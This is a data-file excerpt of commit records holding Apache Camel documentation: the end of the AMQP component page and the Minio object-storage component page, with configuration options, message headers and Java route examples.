| -1 | int\n|===\n\/\/ endpoint options: END\n\n\n### Usage\n\nAs the AMQP component is inherited from the JMS component, the usage of the\nformer is almost identical to that of the latter:\n\n*Using AMQP component*\n\n[source,java]\n------------------------------------\n\/\/ Consuming from AMQP queue\nfrom(\"amqp:queue:incoming\")\n .to(...);\n\n\/\/ Sending message to the AMQP topic\nfrom(...)\n .to(\"amqp:topic:notify\");\n------------------------------------\n\n### Configuring AMQP component\n\nStarting from Camel 2.16.1 you can also use the\n`AMQPComponent#amqp10Component(String connectionURI)` factory method to\nreturn the AMQP 1.0 component with the pre-configured topic prefix:\n\n*Creating AMQP 1.0 component*\n\n[source,java]\n-----------------------------------------------------------------------------------------\nAMQPComponent amqp = AMQPComponent.amqp10Component(\"amqp:\/\/guest:guest@localhost:5672\");\n-----------------------------------------------------------------------------------------\n\nKeep in mind that starting from Camel 2.17 the\n`AMQPComponent#amqp10Component(String connectionURI)` factory\nmethod has been deprecated in favor of\n`AMQPComponent#amqpComponent(String connectionURI)`:\n\n*Creating AMQP 1.0 component*\n\n[source,java]\n--------------------------------------------------------------------------------------------------------\nAMQPComponent amqp = AMQPComponent.amqpComponent(\"amqp:\/\/localhost:5672\");\n\nAMQPComponent authorizedAmqp = AMQPComponent.amqpComponent(\"amqp:\/\/localhost:5672\", \"user\", \"password\");\n--------------------------------------------------------------------------------------------------------\n\nStarting from Camel 2.17, in order to automatically configure the AMQP\ncomponent, you can also add an instance\nof `org.apache.camel.component.amqp.AMQPConnectionDetails` to the\nregistry. For example, for Spring Boot you just have to define a bean:\n\n*AMQP connection details auto-configuration*\n\n[source,java]\n-------------------------------------------------------------------------------------\n@Bean\nAMQPConnectionDetails amqpConnection() {\n return new AMQPConnectionDetails(\"amqp:\/\/localhost:5672\");\n}\n\n@Bean\nAMQPConnectionDetails securedAmqpConnection() {\n return new AMQPConnectionDetails(\"amqp:\/\/localhost:5672\", \"username\", \"password\");\n}\n-------------------------------------------------------------------------------------\n\nLikewise, you can also use CDI producer methods when using Camel-CDI:\n\n*AMQP connection details auto-configuration for CDI*\n\n[source,java]\n-------------------------------------------------------------------------------------\n@Produces\nAMQPConnectionDetails amqpConnection() {\n return new AMQPConnectionDetails(\"amqp:\/\/localhost:5672\");\n}\n-------------------------------------------------------------------------------------
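\n\nTying the request\/reply options from the table above together, here is a minimal sketch of an InOut route over AMQP; the queue name and the timeout value are assumptions for illustration, not defaults:\n\n[source,java]\n-------------------------------------------------------------------------------------\n\/\/ Hypothetical request\/reply (InOut) route: requestTimeout (ms) bounds the wait for\n\/\/ the reply, and transferException rethrows remote failures on the caller side when\n\/\/ both ends are Camel (see the options table above). Uses org.apache.camel.ExchangePattern.\nfrom(\"direct:billing\")\n .to(ExchangePattern.InOut, \"amqp:queue:billing?requestTimeout=20000&transferException=true\")\n .to(\"log:reply\");\n-------------------------------------------------------------------------------------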
\n\nYou can also rely on the <<properties-component,Camel properties>> to read\nthe AMQP connection details. The factory\nmethod `AMQPConnectionDetails.discoverAMQP()` attempts to read Camel\nproperties in a Kubernetes-like convention, as demonstrated in the\nsnippet below:\n\n*AMQP connection details auto-configuration*\n\n[source,bash]\n-----------------------------------------------\nexport AMQP_SERVICE_HOST=\"mybroker.com\"\nexport AMQP_SERVICE_PORT=\"6666\"\nexport AMQP_SERVICE_USERNAME=\"username\"\nexport AMQP_SERVICE_PASSWORD=\"password\"\n-----------------------------------------------\n\n[source,java]\n-----------------------------------------------\n@Bean\nAMQPConnectionDetails amqpConnection() {\n return AMQPConnectionDetails.discoverAMQP();\n}\n-----------------------------------------------\n\n*Enabling AMQP specific options*\n\nIf you, for example, need to enable `amqp.traceFrames` you can do that by appending the option to your URI, as in the following example:\n\n[source,java]\n--------------------------------------------------------------------------------------------------------\nAMQPComponent amqp = AMQPComponent.amqpComponent(\"amqp:\/\/localhost:5672?amqp.traceFrames=true\");\n--------------------------------------------------------------------------------------------------------\n\nFor reference take a look at the https:\/\/qpid.apache.org\/releases\/qpid-jms-0.29.0\/docs\/index.html[QPID JMS client configuration].\n\n### Using topics\n\nTo have topics working with `camel-amqp` you need to configure the\ncomponent to use `topic:\/\/` as the topic prefix, as shown below:\n\n[source,xml]\n-------------------------------------------------------------------------------------------------------------------------------\n <bean id=\"amqp\" class=\"org.apache.camel.component.amqp.AmqpComponent\">\n <property name=\"connectionFactory\">\n <bean class=\"org.apache.qpid.jms.JmsConnectionFactory\" factory-method=\"createFromURL\">\n <property name=\"remoteURI\" value=\"amqp:\/\/localhost:5672\" \/>\n <property name=\"topicPrefix\" value=\"topic:\/\/\" \/> <!-- only necessary when connecting to ActiveMQ over AMQP 1.0 -->\n <\/bean>\n <\/property>\n <\/bean>\n-------------------------------------------------------------------------------------------------------------------------------\n\nKeep in mind that both `AMQPComponent#amqpComponent()` methods and\n`AMQPConnectionDetails` pre-configure the component with the topic\nprefix, so you don't have to configure it explicitly.\n\n### See Also\n\n* Configuring Camel\n* Component\n* Endpoint\n* Getting Started\n","returncode":0,"stderr":"","license":"apache-2.0","lang":"AsciiDoc"}
{"commit":"98be1af5b1f764fd97a3179506a3d3dbbb4f35e0","subject":"Regen","message":"Regen\n","repos":"tadayosi\/camel,apache\/camel,pmoerenhout\/camel,adessaigne\/camel,christophd\/camel,gnodet\/camel,christophd\/camel,tadayosi\/camel,cunningt\/camel,pax95\/camel,apache\/camel,pax95\/camel,nikhilvibhav\/camel,pmoerenhout\/camel,adessaigne\/camel,gnodet\/camel,apache\/camel,nikhilvibhav\/camel,pax95\/camel,gnodet\/camel,pmoerenhout\/camel,cunningt\/camel,tadayosi\/camel,cunningt\/camel,gnodet\/camel,pax95\/camel,christophd\/camel,tdiesler\/camel,christophd\/camel,tadayosi\/camel,pax95\/camel,adessaigne\/camel,nikhilvibhav\/camel,cunningt\/camel,tdiesler\/camel,adessaigne\/camel,tdiesler\/camel,apache\/camel,pax95\/camel,tdiesler\/camel,cunningt\/camel,tdiesler\/camel,adessaigne\/camel,nikhilvibhav\/camel,pmoerenhout\/camel,pmoerenhout\/camel,tadayosi\/camel,apache\/camel,apache\/camel,gnodet\/camel,christophd\/camel,christophd\/camel,adessaigne\/camel,tadayosi\/camel,pmoerenhout\/camel,tdiesler\/camel,cunningt\/camel","old_file":"docs\/components\/modules\/ROOT\/pages\/minio-component.adoc","new_file":"docs\/components\/modules\/ROOT\/pages\/minio-component.adoc","new_contents":"[[minio-component]]\n= Minio Component\n\/\/THIS FILE IS COPIED: EDIT THE SOURCE FILE:\n:page-source: components\/camel-minio\/src\/main\/docs\/minio-component.adoc\n:docTitle: Minio\n:artifactId: camel-minio\n:description: Store and retrieve objects from Minio Storage Service using Minio SDK.\n:since: 3.5\n:supportLevel: Stable\n:component-header: Both producer and consumer are supported\ninclude::{cq-version}@camel-quarkus:ROOT:partial$reference\/components\/minio.adoc[opts=optional]\n\n*Since Camel {since}*\n\n*{component-header}*\n\nThe Minio component supports storing and retrieving objects from\/to the\nhttps:\/\/min.io\/[Minio] service.\n\nPrerequisites\n\nYou must have valid credentials for authorized access to the buckets\/folders. More information is available at\nhttps:\/\/min.io\/[Minio].\n\n== URI Format\n\n[source,java]\n------------------------------\nminio:\/\/bucketName[?options]\n------------------------------\n\nThe bucket will be created if it doesn't already exist. +\nYou can append query options to the URI in the following format,\n?options=value&option2=value&...\n\nFor example, in order to read the file `hello.txt` from the bucket `helloBucket`, use the following snippet:\n\n[source,java]\n--------------------------------------------------------------------------------\nfrom(\"minio:\/\/helloBucket?accessKey=yourAccessKey&secretKey=yourSecretKey&prefix=hello.txt\")\n .to(\"file:\/var\/downloaded\");\n--------------------------------------------------------------------------------\n\n== URI Options\n\n\/\/ component options: START\nThe Minio component supports 47 options, which are listed below.\n\n\n\n[width=\"100%\",cols=\"2,5,^1,2\",options=\"header\"]\n|===\n| Name | Description | Default | Type\n| *autoCreateBucket* (common) | Setting the autocreation of the bucket if the bucket does not exist. | true | boolean\n| *configuration* (common) | The component configuration. | | MinioConfiguration\n| *customHttpClient* (common) | Set custom HTTP client for authenticated access. | | OkHttpClient\n| *endpoint* (common) | The endpoint can be a URL, domain name, IPv4 address or IPv6 address. | | String\n| *minioClient* (common) | *Autowired* Reference to a Minio Client object in the registry. | | MinioClient\n| *objectLock* (common) | Set when creating a new bucket.
| false | boolean\n| *policy* (common) | The policy for this queue to set in the method. | | String\n| *proxyPort* (common) | TCP\/IP port number. 80 and 443 are used as defaults for HTTP and HTTPS. | | Integer\n| *region* (common) | The region in which the Minio client needs to work. When using this parameter, the configuration will expect the lowercase name of the region (for example ap-east-1). You'll need to use the name Region.EU_WEST_1.id(). | | String\n| *secure* (common) | Flag to indicate whether to use a secure connection to the Minio service or not. | false | boolean\n| *serverSideEncryption* (common) | Server-side encryption. | | ServerSideEncryption\n| *serverSideEncryptionCustomer{zwsp}Key* (common) | Server-side encryption for the source object while copying\/moving objects. | | ServerSideEncryptionCustomerKey\n| *autoCloseBody* (consumer) | If this option is true and includeBody is true, then the MinioObject.close() method will be called on exchange completion. This option is strongly related to the includeBody option. In case of setting includeBody to true and autoCloseBody to false, it will be up to the caller to close the MinioObject stream. Setting autoCloseBody to true will close the MinioObject stream automatically. | true | boolean\n| *bridgeErrorHandler* (consumer) | Allows for bridging the consumer to the Camel routing Error Handler, which means any exceptions that occur while the consumer is trying to pick up incoming messages, or the like, will now be processed as a message and handled by the routing Error Handler. By default the consumer will use the org.apache.camel.spi.ExceptionHandler to deal with exceptions, which will be logged at WARN or ERROR level and ignored. | false | boolean\n| *bypassGovernanceMode* (consumer) | Set this flag if you want to bypass governance mode when deleting a particular object. | false | boolean\n| *deleteAfterRead* (consumer) | Delete objects from Minio after they have been retrieved. The delete is only performed if the Exchange is committed. If a rollback occurs, the object is not deleted. If this option is false, then the same objects will be retrieved over and over again in subsequent polls. Therefore you need to use the Idempotent Consumer EIP in the route to filter out duplicates. You can filter using the MinioConstants#BUCKET_NAME and MinioConstants#OBJECT_NAME headers, or only the MinioConstants#OBJECT_NAME header. | true | boolean\n| *delimiter* (consumer) | The delimiter which is used in the ListObjectsRequest to only consume objects we are interested in. | | String\n| *destinationBucketName* (consumer) | Destination bucket name. | | String\n| *destinationObjectName* (consumer) | Destination object name. | | String\n| *includeBody* (consumer) | If it is true, the exchange body will be set to a stream to the contents of the file. If false, the headers will be set with the Minio object metadata, but the body will be null. This option is strongly related to the autoCloseBody option. In case of setting includeBody to true and autoCloseBody to false, it will be up to the caller to close the MinioObject stream. Setting autoCloseBody to true will close the MinioObject stream automatically. | true | boolean\n| *includeFolders* (consumer) | The flag which is used in the ListObjectsRequest to set include folders. | false | boolean\n| *includeUserMetadata* (consumer) | The flag which is used in the ListObjectsRequest to get objects with user metadata. | false | boolean\n| *includeVersions* (consumer) | The flag which is used in the ListObjectsRequest to get objects with versioning.
| false | boolean\n| *length* (consumer) | Number of bytes of object data from offset. | | long\n| *matchETag* (consumer) | Set match ETag parameter for get object(s). | | String\n| *maxConnections* (consumer) | Set the maxConnections parameter in the minio client configuration. | 60 | int\n| *maxMessagesPerPoll* (consumer) | Gets the maximum number of messages as a limit to poll at each polling. The default value is 10. Use 0 or a negative number to set it as unlimited. | 10 | int\n| *modifiedSince* (consumer) | Set modified since parameter for get object(s). | | ZonedDateTime\n| *moveAfterRead* (consumer) | Move objects from one bucket to a different bucket after they have been retrieved. To accomplish the operation the destinationBucketName option must be set. The copy bucket operation is only performed if the Exchange is committed. If a rollback occurs, the object is not moved. | false | boolean\n| *notMatchETag* (consumer) | Set not match ETag parameter for get object(s). | | String\n| *objectName* (consumer) | To get the object from the bucket with the given object name. | | String\n| *offset* (consumer) | Start byte position of object data. | | long\n| *prefix* (consumer) | Object name starts with prefix. | | String\n| *recursive* (consumer) | List objects recursively rather than emulating a directory structure. | false | boolean\n| *startAfter* (consumer) | List objects in the bucket after this object name. | | String\n| *unModifiedSince* (consumer) | Set unmodified since parameter for get object(s). | | ZonedDateTime\n| *useVersion1* (consumer) | When true, version 1 of the REST API is used. | false | boolean\n| *versionId* (consumer) | Set a specific version ID of an object when deleting the object. | | String\n| *deleteAfterWrite* (producer) | Delete the file object after the Minio file has been uploaded. | false | boolean\n| *keyName* (producer) | Setting the key name for an element in the bucket through the endpoint parameter. | | String\n| *lazyStartProducer* (producer) | Whether the producer should be started lazy (on the first message). By starting lazy you can use this to allow CamelContext and routes to startup in situations where a producer may otherwise fail during starting and cause the route to fail being started. By deferring this startup to be lazy then the startup failure can be handled during routing messages via Camel's routing error handlers. Beware that when the first message is processed then creating and starting the producer may take a little time and prolong the total processing time. | false | boolean\n| *operation* (producer) | The operation to do in case the user doesn't want to do only an upload. There are 8 enums and the value can be one of: copyObject, listObjects, deleteObject, deleteObjects, deleteBucket, listBuckets, getObject, getObjectRange | | MinioOperations\n| *pojoRequest* (producer) | If we want to use a POJO request as body or not. | false | boolean\n| *storageClass* (producer) | The storage class to set in the request. | | String\n| *autowiredEnabled* (advanced) | Whether autowiring is enabled. This is used for automatic autowiring options (the option must be marked as autowired) by looking up in the registry to find if there is a single instance of matching type, which then gets configured on the component. This can be used for automatic configuring JDBC data sources, JMS connection factories, AWS Clients, etc.
| true | boolean\n| *accessKey* (security) | Amazon AWS Access Key Id or Minio Access Key. If not set, Camel will connect to the service for anonymous access. | | String\n| *secretKey* (security) | Amazon AWS Secret Access Key or Minio Secret Key. If not set, Camel will connect to the service for anonymous access. | | String\n|===\n\/\/ component options: END\n\n\/\/ endpoint options: START\nThe Minio endpoint is configured using URI syntax:\n\n----\nminio:bucketName\n----\n\nwith the following path and query parameters:\n\n=== Path Parameters (1 parameter):\n\n\n[width=\"100%\",cols=\"2,5,^1,2\",options=\"header\"]\n|===\n| Name | Description | Default | Type\n| *bucketName* | *Required* Bucket name | | String\n|===\n\n\n=== Query Parameters (64 parameters):\n\n\n[width=\"100%\",cols=\"2,5,^1,2\",options=\"header\"]\n|===\n| Name | Description | Default | Type\n| *autoCreateBucket* (common) | Setting the autocreation of the bucket if the bucket does not exist. | true | boolean\n| *customHttpClient* (common) | Set custom HTTP client for authenticated access. | | OkHttpClient\n| *endpoint* (common) | The endpoint can be a URL, domain name, IPv4 address or IPv6 address. | | String\n| *minioClient* (common) | *Autowired* Reference to a Minio Client object in the registry. | | MinioClient\n| *objectLock* (common) | Set when creating a new bucket. | false | boolean\n| *policy* (common) | The policy for this queue to set in the method. | | String\n| *proxyPort* (common) | TCP\/IP port number. 80 and 443 are used as defaults for HTTP and HTTPS. | | Integer\n| *region* (common) | The region in which the Minio client needs to work. When using this parameter, the configuration will expect the lowercase name of the region (for example ap-east-1). You'll need to use the name Region.EU_WEST_1.id(). | | String\n| *secure* (common) | Flag to indicate whether to use a secure connection to the Minio service or not. | false | boolean\n| *serverSideEncryption* (common) | Server-side encryption. | | ServerSideEncryption\n| *serverSideEncryptionCustomer{zwsp}Key* (common) | Server-side encryption for the source object while copying\/moving objects. | | ServerSideEncryptionCustomerKey\n| *autoCloseBody* (consumer) | If this option is true and includeBody is true, then the MinioObject.close() method will be called on exchange completion. This option is strongly related to the includeBody option. In case of setting includeBody to true and autoCloseBody to false, it will be up to the caller to close the MinioObject stream. Setting autoCloseBody to true will close the MinioObject stream automatically. | true | boolean\n| *bridgeErrorHandler* (consumer) | Allows for bridging the consumer to the Camel routing Error Handler, which means any exceptions that occur while the consumer is trying to pick up incoming messages, or the like, will now be processed as a message and handled by the routing Error Handler. By default the consumer will use the org.apache.camel.spi.ExceptionHandler to deal with exceptions, which will be logged at WARN or ERROR level and ignored. | false | boolean\n| *bypassGovernanceMode* (consumer) | Set this flag if you want to bypass governance mode when deleting a particular object. | false | boolean\n| *deleteAfterRead* (consumer) | Delete objects from Minio after they have been retrieved. The delete is only performed if the Exchange is committed. If a rollback occurs, the object is not deleted. If this option is false, then the same objects will be retrieved over and over again in subsequent polls.
Therefore you need to use the Idempotent Consumer EIP in the route to filter out duplicates. You can filter using the MinioConstants#BUCKET_NAME and MinioConstants#OBJECT_NAME headers, or only the MinioConstants#OBJECT_NAME header. | true | boolean\n| *delimiter* (consumer) | The delimiter which is used in the ListObjectsRequest to only consume objects we are interested in. | | String\n| *destinationBucketName* (consumer) | Destination bucket name. | | String\n| *destinationObjectName* (consumer) | Destination object name. | | String\n| *includeBody* (consumer) | If it is true, the exchange body will be set to a stream to the contents of the file. If false, the headers will be set with the Minio object metadata, but the body will be null. This option is strongly related to the autoCloseBody option. In case of setting includeBody to true and autoCloseBody to false, it will be up to the caller to close the MinioObject stream. Setting autoCloseBody to true will close the MinioObject stream automatically. | true | boolean\n| *includeFolders* (consumer) | The flag which is used in the ListObjectsRequest to set include folders. | false | boolean\n| *includeUserMetadata* (consumer) | The flag which is used in the ListObjectsRequest to get objects with user metadata. | false | boolean\n| *includeVersions* (consumer) | The flag which is used in the ListObjectsRequest to get objects with versioning. | false | boolean\n| *length* (consumer) | Number of bytes of object data from offset. | | long\n| *matchETag* (consumer) | Set match ETag parameter for get object(s). | | String\n| *maxConnections* (consumer) | Set the maxConnections parameter in the minio client configuration. | 60 | int\n| *maxMessagesPerPoll* (consumer) | Gets the maximum number of messages as a limit to poll at each polling. The default value is 10. Use 0 or a negative number to set it as unlimited. | 10 | int\n| *modifiedSince* (consumer) | Set modified since parameter for get object(s). | | ZonedDateTime\n| *moveAfterRead* (consumer) | Move objects from one bucket to a different bucket after they have been retrieved. To accomplish the operation the destinationBucketName option must be set. The copy bucket operation is only performed if the Exchange is committed. If a rollback occurs, the object is not moved. | false | boolean\n| *notMatchETag* (consumer) | Set not match ETag parameter for get object(s). | | String\n| *objectName* (consumer) | To get the object from the bucket with the given object name. | | String\n| *offset* (consumer) | Start byte position of object data. | | long\n| *prefix* (consumer) | Object name starts with prefix. | | String\n| *recursive* (consumer) | List objects recursively rather than emulating a directory structure. | false | boolean\n| *sendEmptyMessageWhenIdle* (consumer) | If the polling consumer did not poll any files, you can enable this option to send an empty message (no body) instead. | false | boolean\n| *startAfter* (consumer) | List objects in the bucket after this object name. | | String\n| *unModifiedSince* (consumer) | Set unmodified since parameter for get object(s). | | ZonedDateTime\n| *useVersion1* (consumer) | When true, version 1 of the REST API is used. | false | boolean\n| *versionId* (consumer) | Set a specific version ID of an object when deleting the object. | | String\n| *exceptionHandler* (consumer) | To let the consumer use a custom ExceptionHandler. Notice if the option bridgeErrorHandler is enabled then this option is not in use.
By default the consumer will deal with exceptions that will be logged at WARN or ERROR level and ignored. | | ExceptionHandler\n| *exchangePattern* (consumer) | Sets the exchange pattern when the consumer creates an exchange. There are 3 enums and the value can be one of: InOnly, InOut, InOptionalOut | | ExchangePattern\n| *pollStrategy* (consumer) | A pluggable org.apache.camel.PollingConsumerPollingStrategy allowing you to provide your custom implementation to control error handling that usually occurs during the poll operation, before an Exchange has been created and routed in Camel. | | PollingConsumerPollStrategy\n| *deleteAfterWrite* (producer) | Delete the file object after the Minio file has been uploaded. | false | boolean\n| *keyName* (producer) | Setting the key name for an element in the bucket through the endpoint parameter. | | String\n| *lazyStartProducer* (producer) | Whether the producer should be started lazy (on the first message). By starting lazy you can use this to allow CamelContext and routes to startup in situations where a producer may otherwise fail during starting and cause the route to fail being started. By deferring this startup to be lazy then the startup failure can be handled during routing messages via Camel's routing error handlers. Beware that when the first message is processed then creating and starting the producer may take a little time and prolong the total processing time. | false | boolean\n| *operation* (producer) | The operation to do in case the user doesn't want to do only an upload. There are 8 enums and the value can be one of: copyObject, listObjects, deleteObject, deleteObjects, deleteBucket, listBuckets, getObject, getObjectRange | | MinioOperations\n| *pojoRequest* (producer) | If we want to use a POJO request as body or not. | false | boolean\n| *storageClass* (producer) | The storage class to set in the request. | | String\n| *synchronous* (advanced) | Sets whether synchronous processing should be strictly used, or Camel is allowed to use asynchronous processing (if supported). | false | boolean\n| *backoffErrorThreshold* (scheduler) | The number of subsequent error polls (failed due to some error) that should happen before the backoffMultiplier should kick in. | | int\n| *backoffIdleThreshold* (scheduler) | The number of subsequent idle polls that should happen before the backoffMultiplier should kick in. | | int\n| *backoffMultiplier* (scheduler) | To let the scheduled polling consumer back off if there has been a number of subsequent idles\/errors in a row. The multiplier is then the number of polls that will be skipped before the next actual attempt happens again. When this option is in use then backoffIdleThreshold and\/or backoffErrorThreshold must also be configured. | | int\n| *delay* (scheduler) | Milliseconds before the next poll. | 500 | long\n| *greedy* (scheduler) | If greedy is enabled, then the ScheduledPollConsumer will run immediately again, if the previous run polled 1 or more messages. | false | boolean\n| *initialDelay* (scheduler) | Milliseconds before the first poll starts. | 1000 | long\n| *repeatCount* (scheduler) | Specifies a maximum limit of the number of fires. So if you set it to 1, the scheduler will only fire once. If you set it to 5, it will only fire five times. A value of zero or negative means fire forever. | 0 | long\n| *runLoggingLevel* (scheduler) | The consumer logs a start\/complete log line when it polls. This option allows you to configure the logging level for that.
There are 6 enums and the value can be one of: TRACE, DEBUG, INFO, WARN, ERROR, OFF | TRACE | LoggingLevel\n| *scheduledExecutorService* (scheduler) | Allows for configuring a custom\/shared thread pool to use for the consumer. By default each consumer has its own single threaded thread pool. | | ScheduledExecutorService\n| *scheduler* (scheduler) | To use a cron scheduler from either the camel-spring or camel-quartz component. Use value spring or quartz for the built-in scheduler. | none | Object\n| *schedulerProperties* (scheduler) | To configure additional properties when using a custom scheduler or any of the Quartz or Spring based schedulers. | | Map\n| *startScheduler* (scheduler) | Whether the scheduler should be auto started. | true | boolean\n| *timeUnit* (scheduler) | Time unit for initialDelay and delay options. There are 7 enums and the value can be one of: NANOSECONDS, MICROSECONDS, MILLISECONDS, SECONDS, MINUTES, HOURS, DAYS | MILLISECONDS | TimeUnit\n| *useFixedDelay* (scheduler) | Controls if fixed delay or fixed rate is used. See ScheduledExecutorService in the JDK for details. | true | boolean\n| *accessKey* (security) | Amazon AWS Access Key Id or Minio Access Key. If not set, Camel will connect to the service for anonymous access. | | String\n| *secretKey* (security) | Amazon AWS Secret Access Key or Minio Secret Key. If not set, Camel will connect to the service for anonymous access. | | String\n|===\n\/\/ endpoint options: END\n\nRequired Minio component options\n\nYou have to provide the minioClient in the\nRegistry, or your accessKey and secretKey, to access\nthe https:\/\/min.io\/[Minio] service.\n\n== Batch Consumer\n\nThis component implements the Batch Consumer.\n\nThis allows you, for instance, to know how many messages exist in this\nbatch and to let the Aggregator\naggregate this number of messages.
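\n\nAs a small illustration of the batch consumer (the bucket name and polling values here are placeholder assumptions), the following route consumes at most five objects per poll; Camel's batch consumer support exposes exchange properties such as CamelBatchSize, CamelBatchIndex and CamelBatchComplete:\n\n[source,java]\n--------------------------------------------------------------------------------\n\/\/ Hypothetical batch-consuming route: at most 5 objects per poll, polling every 5s.\nfrom(\"minio:\/\/mycamelbucket?minioClient=#minioClient&maxMessagesPerPoll=5&delay=5000\")\n .log(\"object ${header.CamelMinioObjectName} is ${exchangeProperty.CamelBatchIndex} of ${exchangeProperty.CamelBatchSize}\")\n .to(\"mock:result\");\n--------------------------------------------------------------------------------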
\n\n== Usage\n\n=== Message headers evaluated by the Minio producer\n\n[width=\"100%\",cols=\"10%,10%,80%\",options=\"header\"]\n|=======================================================================\n|Header |Type |Description\n\n|`CamelMinioBucketName` |`String` |The bucket name in which this object will be stored, or which will be used for the current operation\n\n|`CamelMinioDestinationBucketName` |`String` |The destination bucket name which will be used for the current operation\n\n|`CamelMinioContentLength` |`Long` |The content length of this object.\n\n|`CamelMinioContentType` |`String` |The content type of this object.\n\n|`CamelMinioContentControl` |`String` |The content control of this object.\n\n|`CamelMinioContentDisposition` |`String` |The content disposition of this object.\n\n|`CamelMinioContentEncoding` |`String` |The content encoding of this object.\n\n|`CamelMinioContentMD5` |`String` |The MD5 checksum of this object.\n\n|`CamelMinioDestinationObjectName` |`String` |The destination key which will be used for the current operation\n\n|`CamelMinioObjectName` |`String` |The key under which this object will be stored, or which will be used for the current operation\n\n|`CamelMinioLastModified` |`java.util.Date` |The last modified timestamp of this object.\n\n|`CamelMinioOperation` |`String` |The operation to perform. Permitted values are copyObject, deleteObject, deleteObjects, listBuckets, deleteBucket, downloadLink, listObjects\n\n|`CamelMinioStorageClass` |`String` |The storage class of this object.\n\n|`CamelMinioCannedAcl` |`String` |The canned ACL that will be applied to the object. See\n`com.amazonaws.services.s3.model.CannedAccessControlList` for allowed\nvalues.\n\n\/\/|`CamelMinioHeaders` |`Map<String,String>` |Support to get or set custom objectMetadata headers.\n\n|`CamelMinioServerSideEncryption` |String |Sets the server-side encryption algorithm when encrypting\nthe object using Minio-managed keys. For example, use AES256.\n\n|`CamelMinioVersionId` |`String` |The version ID of the object to be stored or returned from the current operation\n|=======================================================================\n\n=== Message headers set by the Minio producer\n\n[width=\"100%\",cols=\"10%,10%,80%\",options=\"header\",]\n|=======================================================================\n|Header |Type |Description\n|`CamelMinioETag` |`String` |The ETag value for the newly uploaded object.\n\n|`CamelMinioVersionId` |`String` |The *optional* version ID of the newly uploaded object.\n\n\/\/|`CamelMinioDownloadLinkExpiration` | `String` | The expiration (millis) of URL download link. The link will be stored into *CamelMinioDownloadLink* response header.\n\n|=======================================================================\n\n=== Message headers set by the Minio consumer\n\n[width=\"100%\",cols=\"10%,10%,80%\",options=\"header\",]\n|=======================================================================\n|Header |Type |Description\n\n|`CamelMinioObjectName` |`String` |The key under which this object is stored.\n\n|`CamelMinioBucketName` |`String` |The name of the bucket in which this object is contained.\n\n|`CamelMinioETag` |`String` |The hex encoded 128-bit MD5 digest of the associated object according to\nRFC 1864. This data is used as an integrity check to verify that the\ndata received by the caller is the same data that was sent by Minio.\n\n|`CamelMinioLastModified` |`Date` |The value of the Last-Modified header, indicating the date and time at\nwhich Minio last recorded a modification to the associated object.\n\n|`CamelMinioVersionId` |`String` |The version ID of the associated Minio object, if available. Version\nIDs are only assigned to objects when an object is uploaded to a Minio bucket that has object versioning enabled.\n\n|`CamelMinioContentType` |`String` |The Content-Type HTTP header, which indicates the type of content stored\nin the associated object. The value of this header is a standard MIME\ntype.\n\n|`CamelMinioContentMD5` |`String` |The base64 encoded 128-bit MD5 digest of the associated object (content\n- not including headers) according to RFC 1864. This data is used as a\nmessage integrity check to verify that the data received by Minio is\nthe same data that the caller sent.\n\n|`CamelMinioContentLength` |`Long` |The Content-Length HTTP header indicating the size of the associated\nobject in bytes.\n\n|`CamelMinioContentEncoding` |`String` |The *optional* Content-Encoding HTTP header specifying what content\nencodings have been applied to the object and what decoding mechanisms\nmust be applied in order to obtain the media-type referenced by the\nContent-Type field.\n\n|`CamelMinioContentDisposition` |`String` |The *optional* Content-Disposition HTTP header, which specifies\npresentational information such as the recommended filename for the\nobject to be saved as.\n\n|`CamelMinioContentControl` |`String` |The *optional* Cache-Control HTTP header which allows the user to\nspecify caching behavior along the HTTP request\/reply chain.\n\n|`CamelMinioServerSideEncryption` |String |The server-side encryption algorithm when encrypting the\nobject using Minio-managed keys.\n|=======================================================================\n\n=== Minio Producer operations\n\nThe Camel-Minio component provides the following operations on the producer side:\n\n- copyObject\n- deleteObject\n- deleteObjects\n- listBuckets\n- deleteBucket\n- listObjects\n- getObject (this will return a MinioObject instance)\n- getObjectRange (this will return a MinioObject instance)\n\n=== Advanced Minio configuration\n\nIf your Camel application is running behind a firewall, or if you need\nmore control over the `MinioClient` instance configuration, you can\ncreate your own instance and refer to it in your Camel minio component configuration:\n\n[source,java]\n--------------------------------------------------------------------------------\nfrom(\"minio:\/\/MyBucket?minioClient=#client&delay=5000&maxMessagesPerPoll=5\")\n.to(\"mock:result\");\n--------------------------------------------------------------------------------
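\n\nThe `#client` reference above must resolve to a MinioClient bean in the registry. As a minimal sketch (the endpoint and credentials are placeholder assumptions, not defaults), such a client can be built with the Minio Java SDK and bound under that name:\n\n[source,java]\n--------------------------------------------------------------------------------\nimport io.minio.MinioClient;\n\n\/\/ Hypothetical client instance; endpoint and credentials are placeholders.\nMinioClient client = MinioClient.builder()\n .endpoint(\"https:\/\/play.min.io\")\n .credentials(\"yourAccessKey\", \"yourSecretKey\")\n .build();\n\n\/\/ Bind it into the registry under the name used in the URI, for example:\ncamelContext.getRegistry().bind(\"client\", client);\n--------------------------------------------------------------------------------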
\n\n=== Minio Producer Operation examples\n\n- CopyObject: this operation copies an object from one bucket to another\n\n[source,java]\n--------------------------------------------------------------------------------\n from(\"direct:start\").process(new Processor() {\n\n @Override\n public void process(Exchange exchange) throws Exception {\n exchange.getIn().setHeader(MinioConstants.DESTINATION_BUCKET_NAME, \"camelDestinationBucket\");\n exchange.getIn().setHeader(MinioConstants.OBJECT_NAME, \"camelKey\");\n exchange.getIn().setHeader(MinioConstants.DESTINATION_OBJECT_NAME, \"camelDestinationKey\");\n }\n })\n .to(\"minio:\/\/mycamelbucket?minioClient=#minioClient&operation=copyObject\")\n .to(\"mock:result\");\n--------------------------------------------------------------------------------\n\nThis operation will copy the object with the name expressed in the header camelDestinationKey to the camelDestinationBucket bucket, from the bucket mycamelbucket.\n\n- DeleteObject: this operation deletes an object from a bucket\n\n[source,java]\n--------------------------------------------------------------------------------\n from(\"direct:start\").process(new Processor() {\n\n @Override\n public void process(Exchange exchange) throws Exception {\n exchange.getIn().setHeader(MinioConstants.OBJECT_NAME, \"camelKey\");\n }\n })\n .to(\"minio:\/\/mycamelbucket?minioClient=#minioClient&operation=deleteObject\")\n .to(\"mock:result\");\n--------------------------------------------------------------------------------\n\nThis operation will delete the object camelKey from the bucket mycamelbucket.
